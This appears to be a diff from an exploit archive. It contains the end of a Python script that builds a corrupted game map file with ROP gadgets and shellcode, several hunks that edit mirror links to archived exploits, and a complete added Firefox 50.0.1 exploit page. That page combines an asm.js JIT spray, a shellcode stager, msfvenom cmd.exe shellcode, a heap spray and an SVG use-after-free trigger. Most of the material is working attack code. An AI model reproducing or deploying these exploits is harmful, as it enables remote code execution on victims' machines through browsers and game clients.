shellcode += "\xeb\xfe"
shellcode += "\xeb\xfe"
shellcode_dwords = int(math.ceil(len(shellcode)/4.0))
extra_dwords = int(math.ceil((len(rop_gadgets)+shellcode_dwords)/3.0))
# Loop count (needs to be the exact amount of ROP we want to write
data_buffer.append(dw(extra_dwords))
for addr in rop_gadgets:
data_buffer.append(dw(addr))
for b in range(shellcode_dwords):
data = ""
for byte in range(4):
idx = byte + b*4
# pad to nearest DWORD with INT3
if idx >= len(shellcode):
data += "\xcc"
else:
data += shellcode[idx]
data_buffer.append(data)
second_idx += 8000*4 # time 4 because we skip every-other WORD, which means each index has 4 bytes
# 8000 is arbitrary, but it doesn't cause the map load to exit with a FATAL before
# we can exploit the function
# UNCOMMENT TO CHANGE INITIAL SIZE OF OVERFLOW
#mmfile[NUM_EDGES_OFF] = pack("B", 0x41)
for i in range(int(math.ceil(len(data_buffer)/3.0))):
mmfile[start_idx+4*i:start_idx+4*(i+1)] = pack("I", 8000+i)
mmfile[second_idx+2*i:second_idx+2*(i+1)] = pack("H", 0x1000+i)
second_idx += 2 # required because the game loads every-other word
# This data will now be on the stack
for j in range(3):
sub_idx = j*4 + i*0xc
data_idx = i*3 + j
towrite = ""
if data_idx >= len(data_buffer):
towrite = "\x00"*4
else:
towrite = data_buffer[i*3 + j]
mmfile[vertex_data_start+sub_idx:vertex_data_start+sub_idx+4] = towrite
#l.debug("Write[%08x] --> offset %d" % (unpack("I", towrite)[0], vertex_data_start+sub_idx))
# write out the corrupted file
outfile = open(output_file, "wb")
outfile.write(mmfile)
outfile.close()
l.info("Wrote %d byte exploit file to %s" % (len(mmfile), output_file))
l.info("Copy to game maps/ directory!")
if __name__ == "__main__":
main()

View file

@ -26,7 +26,7 @@ do not use the exploit for attacking.
The attached file is at:
http://ruder.cdut.net/attach/MS_MDB_Vul/Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.rar
backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4625.rar (11162007-Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.rar)
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4625.rar (11162007-Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.rar)
MD5 Hash:73243B8823C8DC2C88AE0529CA13C4C6

View file

@ -20,6 +20,6 @@
was not properly initialized or (2) is deleted, aka "Time Element Memory Corruption Vulnerability."
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20547.rar
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20547.rar

View file

@ -8,7 +8,7 @@ Version: 0.3z R2
Tested on: Windows XP SP3, Windows 7 Ultimate SP1, Windows Server 2003,
Windows Server 2008, it should work on all Windows.
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20758.tar.gz
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20758.tar.gz
*/
#include "main.h"

View file

@ -2,7 +2,7 @@ FreeSSHD all version Remote Authentication Bypass ZERODAY
Discovered & Exploited by Kingcope
Year 2011
## Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23080.zip
# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23080.zip
Run like:

View file

@ -13,7 +13,7 @@
Generation:
c:\mxmlc\bin>mxmlc.exe AsXploit.as -o AsXploit.swf
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32851-AsXploit.as
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32851-AsXploit.as
-->

View file

@ -0,0 +1,375 @@
<!DOCTYPE HTML>
<!--
FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)
PoC Exploit against Firefox 50.0.1 (CVE-2016-9079 - Tor Browser 0day)
Tested on:
Release 50.0.1 32-bit - Windows 8.1 / Windows 10
https://ftp.mozilla.org/pub/firefox/releases/50.0.1/win32/en-US/Firefox%20Setup%2050.0.1.exe
Howto:
1) serve PoC over network and open it in Firefox 50.0.1 32-bit
2) if you don't see cmd.exe, open processexplorer and verify that cmd.exe was spawned by firefox.exe
A successfull exploit attempt should pop cmd.exe
Writeup: https://rh0dev.github.io/blog/2017/the-return-of-the-jit/
(C) Rh0
Jul. 13, 2017
-->
<script async>
function asm_js_module(){
"use asm";
/* huge jitted nop sled */
function payload_code(){
var val = 0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
val = (val + 0xa8909090)|0;
/* 3 byte VirtualAlloc RWX stager */
val = (val + 0xa890db31)|0;
val = (val + 0xa89030b3)|0;
val = (val + 0xa81b8b64)|0;
val = (val + 0xa80c5b8b)|0;
val = (val + 0xa81c5b8b)|0;
val = (val + 0xa8b9006a)|0;
val = (val + 0xa8904c4c)|0;
val = (val + 0xa8902eb1)|0;
val = (val + 0xa85144b5)|0;
val = (val + 0xa8b99090)|0;
val = (val + 0xa8903233)|0;
val = (val + 0xa89045b1)|0;
val = (val + 0xa8514cb5)|0;
val = (val + 0xa8b99090)|0;
val = (val + 0xa8904e52)|0;
val = (val + 0xa8904bb1)|0;
val = (val + 0xa85145b5)|0;
val = (val + 0xa8590e6a)|0;
val = (val + 0xa84fe789)|0;
val = (val + 0xa8086b8b)|0;
val = (val + 0xa820738b)|0;
val = (val + 0xa8471b8b)|0;
val = (val + 0xa82ae349)|0;
val = (val + 0xa890c031)|0;
val = (val + 0xa890ad66)|0;
val = (val + 0xa89c613c)|0;
val = (val + 0xa8077c9d)|0;
val = (val + 0xa890202c)|0;
val = (val + 0xa89c073a)|0;
val = (val + 0xa8d7749d)|0;
val = (val + 0xa890bdeb)|0;
val = (val + 0xa8b9006a)|0;
val = (val + 0xa890636f)|0;
val = (val + 0xa8906cb1)|0;
val = (val + 0xa8516cb5)|0;
val = (val + 0xa8b99090)|0;
val = (val + 0xa890416c)|0;
val = (val + 0xa89075b1)|0;
val = (val + 0xa85161b5)|0;
val = (val + 0xa8b99090)|0;
val = (val + 0xa8907472)|0;
val = (val + 0xa89056b1)|0;
val = (val + 0xa85169b5)|0;
val = (val + 0xa890eb89)|0;
val = (val + 0xa83cc583)|0;
val = (val + 0xa8006d8b)|0;
val = (val + 0xa890dd01)|0;
val = (val + 0xa878c583)|0;
val = (val + 0xa8006d8b)|0;
val = (val + 0xa890dd01)|0;
val = (val + 0xa820458b)|0;
val = (val + 0xa890d801)|0;
val = (val + 0xa890d231)|0;
val = (val + 0xa890e789)|0;
val = (val + 0xa8590d6a)|0;
val = (val + 0xa810348b)|0;
val = (val + 0xa890de01)|0;
val = (val + 0xa890a6f3)|0;
val = (val + 0xa8900de3)|0;
val = (val + 0xa804c283)|0;
val = (val + 0xa890dbeb)|0;
val = (val + 0xa8247d8b)|0;
val = (val + 0xa890df01)|0;
val = (val + 0xa890ead1)|0;
val = (val + 0xa890d701)|0;
val = (val + 0xa890d231)|0;
val = (val + 0xa8178b66)|0;
val = (val + 0xa81c7d8b)|0;
val = (val + 0xa890df01)|0;
val = (val + 0xa802e2c1)|0;
val = (val + 0xa890d701)|0;
val = (val + 0xa8903f8b)|0;
val = (val + 0xa890df01)|0;
val = (val + 0xa890406a)|0;
val = (val + 0xa890c031)|0;
val = (val + 0xa85030b4)|0;
val = (val + 0xa85010b4)|0;
val = (val + 0xa890006a)|0;
val = (val + 0xa890d7ff)|0;
val = (val + 0xa890c931)|0;
val = (val + 0xa89000b5)|0;
val = (val + 0xa890c3b1)|0;
val = (val + 0xa890ebd9)|0;
val = (val + 0xa82434d9)|0;
val = (val + 0xa890e689)|0;
val = (val + 0xa80cc683)|0;
val = (val + 0xa890368b)|0;
val = (val + 0xa85fc683)|0;
val = (val + 0xa890c789)|0;
val = (val + 0xa81e8b66)|0;
val = (val + 0xa81f8966)|0;
val = (val + 0xa802c683)|0;
val = (val + 0xa802c783)|0;
val = (val + 0xa8901e8a)|0;
val = (val + 0xa8901f88)|0;
val = (val + 0xa803c683)|0;
val = (val + 0xa801c783)|0;
val = (val + 0xa803e983)|0;
val = (val + 0xa89008e3)|0;
val = (val + 0xa890cceb)|0;
val = (val + 0xa890e0ff)|0;
val = (val + 0xa824248d)|0;
/* $ msfvenom --payload windows/exec CMD=cmd.exe EXITFUNC=seh */
val = (val + 0xa882e8fc)|0;
val = (val + 0xa8000000)|0;
val = (val + 0xa8e58960)|0;
val = (val + 0xa864c031)|0;
val = (val + 0xa830508b)|0;
val = (val + 0xa80c528b)|0;
val = (val + 0xa814528b)|0;
val = (val + 0xa828728b)|0;
val = (val + 0xa84ab70f)|0;
val = (val + 0xa8ff3126)|0;
val = (val + 0xa8613cac)|0;
val = (val + 0xa82c027c)|0;
val = (val + 0xa8cfc120)|0;
val = (val + 0xa8c7010d)|0;
val = (val + 0xa852f2e2)|0;
val = (val + 0xa8528b57)|0;
val = (val + 0xa84a8b10)|0;
val = (val + 0xa84c8b3c)|0;
val = (val + 0xa8e37811)|0;
val = (val + 0xa8d10148)|0;
val = (val + 0xa8598b51)|0;
val = (val + 0xa8d30120)|0;
val = (val + 0xa818498b)|0;
val = (val + 0xa8493ae3)|0;
val = (val + 0xa88b348b)|0;
val = (val + 0xa831d601)|0;
val = (val + 0xa8c1acff)|0;
val = (val + 0xa8010dcf)|0;
val = (val + 0xa8e038c7)|0;
val = (val + 0xa803f675)|0;
val = (val + 0xa83bf87d)|0;
val = (val + 0xa875247d)|0;
val = (val + 0xa88b58e4)|0;
val = (val + 0xa8012458)|0;
val = (val + 0xa88b66d3)|0;
val = (val + 0xa88b4b0c)|0;
val = (val + 0xa8011c58)|0;
val = (val + 0xa8048bd3)|0;
val = (val + 0xa8d0018b)|0;
val = (val + 0xa8244489)|0;
val = (val + 0xa85b5b24)|0;
val = (val + 0xa85a5961)|0;
val = (val + 0xa8e0ff51)|0;
val = (val + 0xa85a5f5f)|0;
val = (val + 0xa8eb128b)|0;
val = (val + 0xa86a5d8d)|0;
val = (val + 0xa8858d01)|0;
val = (val + 0xa80000b2)|0;
val = (val + 0xa8685000)|0;
val = (val + 0xa86f8b31)|0;
val = (val + 0xa8d5ff87)|0;
val = (val + 0xa80efebb)|0;
val = (val + 0xa868ea32)|0;
val = (val + 0xa8bd95a6)|0;
val = (val + 0xa8d5ff9d)|0;
val = (val + 0xa87c063c)|0;
val = (val + 0xa8fb800a)|0;
val = (val + 0xa80575e0)|0;
val = (val + 0xa81347bb)|0;
val = (val + 0xa86a6f72)|0;
val = (val + 0xa8ff5300)|0;
val = (val + 0xa86d63d5)|0;
val = (val + 0xa8652e64)|0;
val = (val + 0xa8006578)|0;
val = (val + 0xa8909090)|0;
return val|0;
}
return payload_code
}
</script>
<script>
function spray_asm_js_modules(){
sprayed = []
for (var i=0; i<= 0x1800; i++){
sprayed[i] = asm_js_module()
}
}
/* heap spray inspired by skylined */
function heap_spray_fake_objects(){
var heap = []
var current_address = 0x08000000
var block_size = 0x1000000
while(current_address < object_target_address){
var heap_block = new Uint32Array(block_size/4 - 0x100)
for (var offset = 0; offset < block_size; offset += 0x100000){
/* fake object target = ecx + 0x88 and fake vtable*/
heap_block[offset/4 + 0x00/4] = object_target_address
/* self + 4 */
heap_block[offset/4 + 0x14/4] = object_target_address
/* the path to EIP */
heap_block[offset/4 + 0x18/4] = 4
heap_block[offset/4 + 0xac/4] = 1
/* fake virtual function --> JIT target */
heap_block[offset/4 + 0x138/4] = jit_payload_target
}
heap.push(heap_block)
current_address += block_size
}
return heap
}
/* address of fake object */
object_target_address = 0x30300000
/* address of our jitted shellcode */
jit_payload_target = 0x1c1c0054
/* ASM.JS JIT Spray */
spray_asm_js_modules()
/* Spray fake objects */
heap = heap_spray_fake_objects()
/* -----> */
/* bug trigger ripped from bugzilla report */
var worker = new Worker('data:javascript,self.onmessage=function(msg){postMessage("one");postMessage("two");};');
worker.postMessage("zero");
var svgns = 'http://www.w3.org/2000/svg';
var heap80 = new Array(0x1000);
var heap100 = new Array(0x4000);
var block80 = new ArrayBuffer(0x80);
var block100 = new ArrayBuffer(0x100);
var sprayBase = undefined;
var arrBase = undefined;
var animateX = undefined;
var containerA = undefined;
var offset = 0x88 // Firefox 50.0.1
var exploit = function(){
var u32 = new Uint32Array(block80)
u32[0x4] = arrBase - offset;
u32[0xa] = arrBase - offset;
u32[0x10] = arrBase - offset;
for(i = heap100.length/2; i < heap100.length; i++)
{
heap100[i] = block100.slice(0)
}
for(i = 0; i < heap80.length/2; i++)
{
heap80[i] = block80.slice(0)
}
animateX.setAttribute('begin', '59s')
animateX.setAttribute('begin', '58s')
for(i = heap80.length/2; i < heap80.length; i++)
{
heap80[i] = block80.slice(0)
}
for(i = heap100.length/2; i < heap100.length; i++)
{
heap100[i] = block100.slice(0)
}
animateX.setAttribute('begin', '10s')
animateX.setAttribute('begin', '9s')
containerA.pauseAnimations();
}
worker.onmessage = function(e) {arrBase=object_target_address; exploit()}
//worker.onmessage = function(e) {arrBase=0x30300000; exploit()}
var trigger = function(){
containerA = document.createElementNS(svgns, 'svg')
var containerB = document.createElementNS(svgns, 'svg');
animateX = document.createElementNS(svgns, 'animate')
var animateA = document.createElementNS(svgns, 'animate')
var animateB = document.createElementNS(svgns, 'animate')
var animateC = document.createElementNS(svgns, 'animate')
var idA = "ia";
var idC = "ic";
animateA.setAttribute('id', idA);
animateA.setAttribute('end', '50s');
animateB.setAttribute('begin', '60s');
animateB.setAttribute('end', idC + '.end');
animateC.setAttribute('id', idC);
animateC.setAttribute('end', idA + '.end');
containerA.appendChild(animateX)
containerA.appendChild(animateA)
containerA.appendChild(animateB)
containerB.appendChild(animateC)
document.body.appendChild(containerA);
document.body.appendChild(containerB);
}
window.onload = trigger;
setInterval("window.location.reload()", 3000)
/* <----- */
</script>

View file

@ -1,5 +1,5 @@
Windows RSH daemon <= 1.8 Remote Buffer Overflow Exploit
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4948.tar.gz (2008-prdelka-vs-MS-rshd.tar.gz)
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4948.tar.gz (2008-prdelka-vs-MS-rshd.tar.gz)
# milw0rm.com [2008-01-21]

View file

@ -1,5 +1,5 @@
Versant server <= 7.0.1.3 Arbitrary Commands Execution Exploit
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5213.zip (2008-versantcmd.zip)
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5213.zip (2008-versantcmd.zip)
# milw0rm.com [2008-03-04]